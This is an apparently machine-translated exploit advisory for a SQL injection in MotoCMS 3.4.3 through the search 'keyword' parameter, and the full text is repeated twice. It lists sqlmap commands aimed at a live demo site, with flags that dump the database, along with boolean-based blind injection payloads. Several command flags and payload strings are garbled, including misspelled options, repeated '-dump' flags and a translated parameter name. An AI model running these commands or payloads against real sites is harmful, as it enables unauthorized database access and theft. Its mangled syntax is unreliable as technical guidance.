#title: MotoCMS版本3.4.3 -SQL注入
#作者: TMRSWRR
#日期: 01/06/2023
#vendor: https://www.motocms.com
#link: https://www.motocms.com/website-templates/demo/189526.html
#脆弱版本: MOTOCMS 3.4.3
## 描述
MotoCMS版本3.4.3通过关键字参数注入SQL。
##复制步骤
1)访问URL:
2)运行sqlmap -u'https://template189526.motopreview.com/store/category/category/search/?keyword=1'---random-agent - landom -agent - level -5 -crisk 3 -batch 3 - batch and this命令sqlmap -u sqlmap -u 'https://template189526.motopreview.com/store/category/category/search/?keyword=1*'---random-agent - level 5 - lisk 3 - -risk 3 -batch-timeout=10 -drop-set-cookie -o-dump-dump-dump
###参数有效载荷###
参数:关键字(GET)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
payload:关键字=1%'和3602=3602和'znyv%'='znyv
参数:#1*(URI)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
payload: https://template189526.motopreview.com:443/store/category/category/search/?关键字=1%'and 6651=6651=6651和'bvje%'='bvje
#作者: TMRSWRR
#日期: 01/06/2023
#vendor: https://www.motocms.com
#link: https://www.motocms.com/website-templates/demo/189526.html
#脆弱版本: MOTOCMS 3.4.3
## 描述
MotoCMS版本3.4.3通过关键字参数注入SQL。
##复制步骤
1)访问URL:
2)运行sqlmap -u'https://template189526.motopreview.com/store/category/category/search/?keyword=1'---random-agent - landom -agent - level -5 -crisk 3 -batch 3 - batch and this命令sqlmap -u sqlmap -u 'https://template189526.motopreview.com/store/category/category/search/?keyword=1*'---random-agent - level 5 - lisk 3 - -risk 3 -batch-timeout=10 -drop-set-cookie -o-dump-dump-dump
###参数有效载荷###
参数:关键字(GET)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
payload:关键字=1%'和3602=3602和'znyv%'='znyv
参数:#1*(URI)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
payload: https://template189526.motopreview.com:443/store/category/category/search/?关键字=1%'and 6651=6651=6651和'bvje%'='bvje
